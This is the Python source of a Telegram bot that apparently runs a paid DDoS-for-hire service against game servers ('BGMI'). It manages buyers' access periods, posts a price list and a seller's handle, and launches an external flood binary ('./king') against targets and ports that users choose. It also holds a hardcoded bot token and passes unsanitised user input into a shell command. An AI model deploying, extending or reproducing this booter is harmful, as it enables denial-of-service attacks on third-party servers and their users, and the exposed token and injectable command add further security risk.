telegram-bot / app.py
Pushp0120's picture
Update app.py
474db42 verified
#!/usr/bin/python3
import os
import telebot
from flask import Flask, request
import subprocess
import requests
import datetime
import threading
from dotenv import load_dotenv
# Load environment variables
load_dotenv()
# Initialize Flask app
app = Flask(__name__)
# Get bot token from environment variables
BOT_TOKEN = os.getenv('BOT_TOKEN', '8686080430:AAFdzAYwM4hNTsyiknJMIfBFTtSOHkgn-E8')
bot = telebot.TeleBot(BOT_TOKEN)
# Admin user IDs
admin_id = ["7474658501"]
# File to store allowed user IDs
USER_FILE = "users.txt"
# File to store command logs
LOG_FILE = "log.txt"
# Function to read user IDs from the file
def read_users():
try:
with open(USER_FILE, "r") as file:
return file.read().splitlines()
except FileNotFoundError:
return []
# List to store allowed user IDs
allowed_user_ids = read_users()
# Function to log command to the file
def log_command(user_id, target, port, time):
admin_id = ["7474658501"]
user_info = bot.get_chat(user_id)
if user_info.username:
username = "@" + user_info.username
else:
username = f"UserID: {user_id}"
with open(LOG_FILE, "a") as file: # Open in "append" mode
file.write(f"Username: {username}\nTarget: {target}\nPort: {port}\nTime: {time}\n\n")
# Function to clear logs
def clear_logs():
try:
with open(LOG_FILE, "r+") as file:
if file.read() == "":
response = "Logs are already cleared. No data found."
else:
file.truncate(0)
response = "Logs cleared successfully"
except FileNotFoundError:
response = "No logs found to clear."
return response
# Function to record command logs
def record_command_logs(user_id, command, target=None, port=None, time=None):
log_entry = f"UserID: {user_id} | Time: {datetime.datetime.now()} | Command: {command}"
if target:
log_entry += f" | Target: {target}"
if port:
log_entry += f" | Port: {port}"
if time:
log_entry += f" | Time: {time}"
with open(LOG_FILE, "a") as file:
file.write(log_entry + "\n")
# Dictionary to store the approval expiry date for each user
user_approval_expiry = {}
# Function to calculate remaining approval time
def get_remaining_approval_time(user_id):
expiry_date = user_approval_expiry.get(user_id)
if expiry_date:
remaining_time = expiry_date - datetime.datetime.now()
if remaining_time.days < 0:
return "Expired"
else:
return str(remaining_time)
else:
return "N/A"
# Function to add or update user approval expiry date
def set_approval_expiry_date(user_id, duration, time_unit):
current_time = datetime.datetime.now()
if time_unit == "hour" or time_unit == "hours":
expiry_date = current_time + datetime.timedelta(hours=duration)
elif time_unit == "day" or time_unit == "days":
expiry_date = current_time + datetime.timedelta(days=duration)
elif time_unit == "week" or time_unit == "weeks":
expiry_date = current_time + datetime.timedelta(weeks=duration)
elif time_unit == "month" or time_unit == "months":
expiry_date = current_time + datetime.timedelta(days=30 * duration) # Approximation of a month
else:
return False
user_approval_expiry[user_id] = expiry_date
return True
# Command handler for adding a user with approval time
@bot.message_handler(commands=['add'])
def add_user(message):
user_id = str(message.chat.id)
if user_id in admin_id:
command = message.text.split()
if len(command) > 2:
user_to_add = command[1]
duration_str = command[2]
try:
duration = int(duration_str[:-4]) # Extract the numeric part of the duration
if duration <= 0:
raise ValueError
time_unit = duration_str[-4:].lower() # Extract the time unit (e.g., 'hour', 'day', 'week', 'month')
if time_unit not in ('hour', 'hours', 'day', 'days', 'week', 'weeks', 'month', 'months'):
raise ValueError
except ValueError:
response = "Invalid duration format. Please provide a positive integer followed by 'hour(s)', 'day(s)', 'week(s)', or 'month(s)'."
bot.reply_to(message, response)
return
if user_to_add not in allowed_user_ids:
allowed_user_ids.append(user_to_add)
with open(USER_FILE, "a") as file:
file.write(f"{user_to_add}\n")
if set_approval_expiry_date(user_to_add, duration, time_unit):
response = f"User {user_to_add} added successfully for {duration} {time_unit}. Access will expire on {user_approval_expiry[user_to_add].strftime('%Y-%m-%d %H:%M:%S')}."
else:
response = "Failed to set approval expiry date. Please try again later."
else:
response = "User already exists."
else:
response = "Please specify a user ID and the duration (e.g., 1hour, 2days, 3weeks, 4months) to add."
else:
response = "Only admin can use this command."
bot.reply_to(message, response)
# Command handler for retrieving user info
@bot.message_handler(commands=['myinfo'])
def get_user_info(message):
user_id = str(message.chat.id)
user_info = bot.get_chat(user_id)
username = user_info.username if user_info.username else "N/A"
user_role = "Admin" if user_id in admin_id else "User"
remaining_time = get_remaining_approval_time(user_id)
response = f"Your Info:\n\nUser ID: <code>{user_id}</code>\nUsername: {username}\nRole: {user_role}\nApproval Expiry Date: {user_approval_expiry.get(user_id, 'Not Approved')}\nRemaining Approval Time: {remaining_time}"
bot.reply_to(message, response, parse_mode="HTML")
@bot.message_handler(commands=['remove'])
def remove_user(message):
user_id = str(message.chat.id)
if user_id in admin_id:
command = message.text.split()
if len(command) > 1:
user_to_remove = command[1]
if user_to_remove in allowed_user_ids:
allowed_user_ids.remove(user_to_remove)
with open(USER_FILE, "w") as file:
for user_id in allowed_user_ids:
file.write(f"{user_id}\n")
response = f"User {user_to_remove} removed successfully."
else:
response = f"User {user_to_remove} not found in the list."
else:
response = "Please Specify A User ID to Remove. Usage: /remove <userid>"
else:
response = "Only admin can use this command."
bot.reply_to(message, response)
@bot.message_handler(commands=['clearlogs'])
def clear_logs_command(message):
user_id = str(message.chat.id)
if user_id in admin_id:
try:
with open(LOG_FILE, "r+") as file:
log_content = file.read()
if log_content.strip() == "":
response = "Logs are already cleared. No data found."
else:
file.truncate(0)
response = "Logs Cleared Successfully"
except FileNotFoundError:
response = "Logs are already cleared."
else:
response = "Only admin can use this command."
bot.reply_to(message, response)
@bot.message_handler(commands=['clearusers'])
def clear_users_command(message):
user_id = str(message.chat.id)
if user_id in admin_id:
try:
with open(USER_FILE, "r+") as file:
log_content = file.read()
if log_content.strip() == "":
response = "USERS are already cleared. No data found."
else:
file.truncate(0)
response = "users Cleared Successfully"
except FileNotFoundError:
response = "users are already cleared."
else:
response = "Only admin can use this command."
bot.reply_to(message, response)
@bot.message_handler(commands=['allusers'])
def show_all_users(message):
user_id = str(message.chat.id)
if user_id in admin_id:
try:
with open(USER_FILE, "r") as file:
user_ids = file.read().splitlines()
if user_ids:
response = "Authorized Users:\n"
for user_id in user_ids:
try:
user_info = bot.get_chat(int(user_id))
username = user_info.username
response += f"- @{username} (ID: {user_id})\n"
except Exception as e:
response += f"- User ID: {user_id}\n"
else:
response = "No data found"
except FileNotFoundError:
response = "No data found"
else:
response = "Only admin can use this command."
bot.reply_to(message, response)
@bot.message_handler(commands=['logs'])
def show_recent_logs(message):
user_id = str(message.chat.id)
if user_id in admin_id:
if os.path.exists(LOG_FILE) and os.stat(LOG_FILE).st_size > 0:
try:
with open(LOG_FILE, "rb") as file:
bot.send_document(message.chat.id, file)
except FileNotFoundError:
response = "No data found."
bot.reply_to(message, response)
else:
response = "No data found"
bot.reply_to(message, response)
else:
response = "Only admin can use this command."
bot.reply_to(message, response)
# Function to handle the reply when free users run the /attack command
def start_attack_reply(message, target, port, time):
user_info = message.from_user
username = user_info.username if user_info.username else user_info.first_name
response = f"{username}, ATTACK STARTED.\n\nTarget: {target}\nPort: {port}\nTime: {time} Seconds\nMethod: VIP"
bot.reply_to(message, response)
# Dictionary to store the last time each user ran the /attack command
bgmi_cooldown = {}
COOLDOWN_TIME = 0
# Handler for /attack command
@bot.message_handler(commands=['attack'])
def handle_attack(message):
user_id = str(message.chat.id)
if user_id in allowed_user_ids or user_id in admin_id:
# Check if the user is in admin_id (admins have no cooldown)
if user_id not in admin_id:
# Check if the user has run the command before and is still within the cooldown period
if user_id in bgmi_cooldown and (datetime.datetime.now() - bgmi_cooldown[user_id]).seconds < 0:
response = "You Are On Cooldown. Please Wait 0sec Before Running The /attack Command Again."
bot.reply_to(message, response)
return
# Update the last time the user ran the command
bgmi_cooldown[user_id] = datetime.datetime.now()
command = message.text.split()
if len(command) == 4: # Updated to accept target, time, and port
target = command[1]
port = int(command[2]) # Convert time to integer
time = int(command[3]) # Convert port to integer
if time > 1000:
response = "Error: Time interval must be less than 1000."
bot.reply_to(message, response)
return
else:
record_command_logs(user_id, '/attack', target, port, time)
log_command(user_id, target, port, time)
start_attack_reply(message, target, port, time) # Call start_attack_reply function
# Execute king binary in isolated environment to prevent it from accessing bot
original_token = bot.token
def run_attack():
# Temporarily replace bot token to prevent king from sending messages
bot.token = "INVALID_TOKEN"
full_command = f"./king {target} {port} {time} 500"
result = subprocess.run(full_command, shell=True, capture_output=True, text=True)
# Restore original token
bot.token = original_token
completion_msg = f"Attack Finished. Target: {target} Port: {port} Time: {time} seconds"
bot.send_message(message.chat.id, completion_msg)
thread = threading.Thread(target=run_attack)
thread.start()
else:
response = "Usage :- /attack <target> <port> <time>" # Updated command syntax
bot.reply_to(message, response)
return
else:
response = """ Unauthorized Access!
Oops! It seems like you don't have permission to use the /attack command.
DM TO BUY ACCESS:- @kingthenos_bhai"""
bot.reply_to(message, response)
# Add /mylogs command to display logs recorded for bgmi and website commands
@bot.message_handler(commands=['mylogs'])
def show_command_logs(message):
user_id = str(message.chat.id)
if user_id in allowed_user_ids or user_id in admin_id:
try:
with open(LOG_FILE, "r") as file:
command_logs = file.readlines()
user_logs = [log for log in command_logs if f"UserID: {user_id}" in log]
if user_logs:
response = "Your Command Logs:\n" + "".join(user_logs)
else:
response = "No Command Logs Found For You."
except FileNotFoundError:
response = "No command logs found."
else:
response = "You Are Not Authorized To Use This Command."
bot.reply_to(message, response)
@bot.message_handler(commands=['help'])
def show_help(message):
help_text =''' Available commands:
/attack : Method For Bgmi Servers.
/rules : Please Check Before Use !!.
/mylogs : To Check Your Recents Attacks.
/plan : Checkout Our Botnet Rates.
/myinfo : TO Check Your WHOLE INFO.
To See Admin Commands:
/admincmd : Shows All Admin Commands.
Buy From :- @kingthenos_bhai
Official Channel :- https://t.me/+Bz7yCgbYk7RkNzQ9
'''
bot.reply_to(message, help_text)
@bot.message_handler(commands=['start'])
def welcome_start(message):
user_id = str(message.chat.id)
user_name = message.from_user.first_name
if user_id in admin_id:
response = f'''{user_name}! THIS IS HIGH QUALITY SERVER BASED DDOS.
You are ADMIN! Full access granted.
Admin Commands:
/attack <target> <port> <time>
/admincmd - Admin tools
/allusers - Manage users
/help - All commands'''
else:
response = f'''{user_name}! THIS IS HIGH QUALITY SERVER BASED DDOS. TO GET ACCESS.
Try To Run This Command : /help
BUY :- @kingthenos_bhai'''
bot.reply_to(message, response)
@bot.message_handler(commands=['rules'])
def welcome_rules(message):
user_name = message.from_user.first_name
response = f'''{user_name} Please Follow These Rules :
1. Dont Run Too Many Attacks !! Cause A Ban From Bot
2. Dont Run 2 Attacks At Same Time Becz If U Then U Got Banned From Bot.
3. MAKE SURE YOU JOINED https://t.me/+Bz7yCgbYk7RkNzQ9 OTHERWISE NOT WORK
4. We Daily Checks The Logs So Follow these rules to avoid Ban!!'''
bot.reply_to(message, response)
@bot.message_handler(commands=['plan'])
def welcome_plan(message):
user_name = message.from_user.first_name
response = f'''{user_name}, Brother Only 1 Plan Is Powerfull Then Any Other Ddos !!:
Vip :
-> Attack Time : 300 (S)
> After Attack Limit : 10 sec
-> Concurrents Attack : 5
Pr-ice List:
3 day--> 200
Week-->300 Rs
Month-->500 Rs
'''
bot.reply_to(message, response)
@bot.message_handler(commands=['admincmd'])
def welcome_plan(message):
user_name = message.from_user.first_name
response = f'''{user_name}, Admin Commands Are Here!!:
/add <userId> : Add a User.
/remove <userid> Remove a User.
/allusers : Authorised Users Lists.
/logs : All Users Logs.
/broadcast : Broadcast a Message.
/clearlogs : Clear The Logs File.
/clearusers : Clear The USERS File.
/kill : Kill Hanging Attack Processes.
'''
bot.reply_to(message, response)
@bot.message_handler(commands=['broadcast'])
def broadcast_message(message):
user_id = str(message.chat.id)
if user_id in admin_id:
command = message.text.split(maxsplit=1)
if len(command) > 1:
message_to_broadcast = " Message To All Users By Admin:\n\n" + command[1]
with open(USER_FILE, "r") as file:
user_ids = file.read().splitlines()
for user_id in user_ids:
try:
bot.send_message(user_id, message_to_broadcast)
except Exception as e:
print(f"Failed to send broadcast message to user {user_id}: {str(e)}")
response = "Broadcast Message Sent Successfully To All Users."
else:
response = " Please Provide A Message To Broadcast."
else:
response = "Only Admin Can Run This Command."
bot.reply_to(message, response)
@bot.message_handler(commands=['kill'])
def kill_processes(message):
user_id = str(message.chat.id)
if user_id in admin_id:
try:
subprocess.run("pkill -f king", shell=True)
response = "All attack processes killed successfully! Server freed."
except Exception as e:
response = f"Failed to kill processes: {str(e)}"
else:
response = "Only Admin Can Run This Command."
bot.reply_to(message, response)
# Webhook route for Hugging Face Spaces
@app.route('/' + BOT_TOKEN, methods=['POST'])
def webhook():
if request.headers.get('content-type') == 'application/json':
json_string = request.get_data().decode('utf-8')
update = telebot.types.Update.de_json(json_string)
bot.process_new_updates([update])
return '', 200
return '', 400
# Health check endpoint
@app.route('/')
def health_check():
return "Bot is running!", 200
# Function to set webhook
def set_webhook():
# In Hugging Face Spaces, the webhook URL will be your space URL + bot token
webhook_url = f"https://{os.getenv('SPACE_NAME', 'telegram-bot')}.hf.space/{BOT_TOKEN}"
bot.remove_webhook()
bot.set_webhook(url=webhook_url)
print(f"Webhook set to: {webhook_url}")
if __name__ == '__main__':
# Set webhook when the app starts
set_webhook()
# Run Flask app
app.run(host='0.0.0.0', port=7860)